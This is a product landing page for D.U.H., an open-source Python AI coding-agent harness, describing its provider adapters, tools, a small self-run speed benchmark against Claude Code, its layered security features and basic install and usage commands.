____        _   _       _   _
|  _ \   _  | | | |  _  | | | |
| | | | (_) | | | | (_) | |_| |
| | | |     | | | |     |  _  |
| |_| |  _  | |_| |  _  | | | |
|____/  (_)  \___/  (_) |_| |_|

D.U.H. is a Universal Harness

Open Source ยท Apache 2.0 ยท Production Alpha

The Universal AI
Coding Agent

One harness. Any model. Your machine.

$ pip install duh-cli
4160 tests passing 100% coverage 5 providers 26 built-in tools 3-layer security 54 ADRs Python 3.12+ Apache 2.0

Everything you need.
Nothing you don't.

D.U.H. is designed around a clean hexagonal kernel โ€” providers plug in at the edge, tools compose in the middle, and security wraps every layer.

๐Ÿ”Œ

Provider Freedom

Anthropic Claude, OpenAI API, ChatGPT Plus/Pro (Codex via OAuth), local Ollama, or a deterministic stub for CI. Switch providers at runtime โ€” same harness, any model.

anthropic openai ollama litellm
๐Ÿ›ก๏ธ

Security-First by Design

3-layer pluggable security: 13 vulnerability scanners, taint-propagating UntrustedStr, HMAC-bound confirmation tokens, lethal trifecta check, macOS Seatbelt + Linux Landlock sandboxing.

taint propagation sandboxing SARIF
โšก

28% Faster than Claude Code

45.7s average vs 63.2s for Claude Code on identical tasks with the same model. Direct Python process โ€” no Node.js runtime, no Ink TUI overhead. 100% success rate vs 67%.

benchmark startup
๐Ÿ”ง

26 Built-in Tools

Read, Write, Edit, MultiEdit, Bash, Glob, Grep, WebSearch, WebFetch, Task (subagents), Docker, Database, HTTP, GitHub, LSP, TestImpact, MemoryStore, NotebookEdit, and more.

26 tools MCP skills
๐Ÿ’ป

Rich TUI & REPL

Full Textual TUI, Rich-powered REPL with 21 slash commands including /connect (OAuth), /snapshot, /plan, /pr, /compact. Print mode for CI pipelines. SDK mode via NDJSON.

REPL print mode SDK mode
๐Ÿ”—

Claude Agent SDK Drop-in

Implements the full NDJSON streaming protocol. Drop duh anywhere claude is expected โ€” same interface, any provider behind it. Verified end-to-end.

NDJSON stream-json ADR-021

Numbers don't lie.

3 independent runs per tool, same model (Claude Haiku 4.5), same prompt, same task (FastAPI URL shortener from spec), fully isolated directories.

28%
Faster average execution
45.7s
D.U.H. avg completion time
63.2s
Claude Code avg time
100%
D.U.H. success rate (3/3)
67%
Claude Code success rate (2/3)
18
Avg tests generated (D.U.H.)
10.5
Avg tests generated (CC)
419
Avg lines of code (D.U.H.)
Metric D.U.H. (n=3) Claude Code (n=2 successful)
Avg completion time 45.7s 63.2s
Success rate 3/3 (100%) 2/3 (67%)
Avg LOC generated 419 273
Avg tests generated 18 10.5
All tests pass (on success) 3/3 โœ“ 2/2 โœ“
Self-correction behavior Yes (detected & fixed Pydantic issue) Minimal
Runtime / startup Python (direct) Node.js + Ink TUI
โ„น

Methodology: Same Anthropic API key, same model (Haiku 4.5), same prompt verbatim, same TASK.md, separate directories, fresh git repo per run, --max-turns 15 on both tools. D.U.H. advantage is architectural simplicity โ€” less startup overhead means more time for actual model interaction. See full benchmark report.

The deepest security
story in open-source AI agents.

Three independent layers that address every published agent RCE in the 2024โ€“2026 CVE corpus. No other open-source AI coding agent comes close.

Layer 1 Vulnerability Monitoring

  • 13 scanners across 3 tiers (Minimal / Extended / Paranoid)
  • Project-file RCE scanner (CVE-2025-59536)
  • MCP tool-poisoning scanner (CVE-2025-54136)
  • Sandbox bypass scanner (CVE-2025-59532)
  • Command injection scanner (CVE-2026-35022)
  • OAuth hardening scanner
  • SARIF output for GitHub Code Scanning
  • Pre-push git hook installer
  • duh security scan ยท duh security init

Layer 2 Runtime Hardening

  • Taint propagation โ€” UntrustedStr tags every string by origin and propagates through all string ops
  • Confirmation tokens โ€” HMAC-bound, prevent tainted strings reaching Bash/Write/Edit without user confirmation
  • Lethal trifecta check โ€” blocks sessions with simultaneous read-private + read-untrusted + network-egress
  • MCP Unicode normalization (GlassWorm defense)
  • Per-hook filesystem namespacing
  • PEP 578 audit hook bridge (sub-500ns)
  • Signed plugin manifests (TOFU + sigstore-ready)

Layer 3 OS Sandboxing

  • macOS Seatbelt โ€” sandbox-exec profiles for shell commands and MCP servers
  • Linux Landlock โ€” syscall-level filesystem access control
  • Network policy layer โ€” blocks outbound traffic unless explicitly allowed
  • Approval modes: suggest / auto-edit / full-auto
  • MCP subprocess sandboxing via host OS facilities
  • Provider differential fuzzer (Hypothesis property tests)
Deep dive into security โ†’

Any model. Zero lock-in.

D.U.H.'s kernel never imports a provider directly. Providers are adapters at the edge โ€” swap them without touching your workflow.

๐Ÿ”ฎ

Anthropic Claude

API key or /connect

๐Ÿค–

OpenAI API

GPT-4o, o1, o3

๐Ÿ’ฌ

ChatGPT / Codex

PKCE OAuth โ€” no API key

๐Ÿฆ™

Ollama

Local โ€” any pulled model

๐Ÿงช

Stub Provider

Deterministic CI testing

๐ŸŒ

litellm / OpenRouter

100+ models via proxy

Up in 60 seconds.

Terminal
# Install
pip install duh-cli

# Set your Anthropic key
export ANTHROPIC_API_KEY=sk-ant-...

# Run a task (print mode โ€” great for scripts)
duh -p "fix the bug in auth.py"

# Interactive REPL
duh

# Use a different model / provider
duh --provider openai --model gpt-4o -p "refactor db.py"

# Local model with Ollama
duh --provider ollama --model qwen2.5-coder -p "write tests"

# Run diagnostics
duh doctor

# Security scan (SARIF output)
duh security scan
Full Getting Started Guide โ†’

Built for production alpha.

4160
Tests passing
100%
Line coverage
54
Architecture Decision Records
26
Built-in tools
5
Provider adapters
29
Hook event types
13
Vulnerability scanners
2.3x
Test:code ratio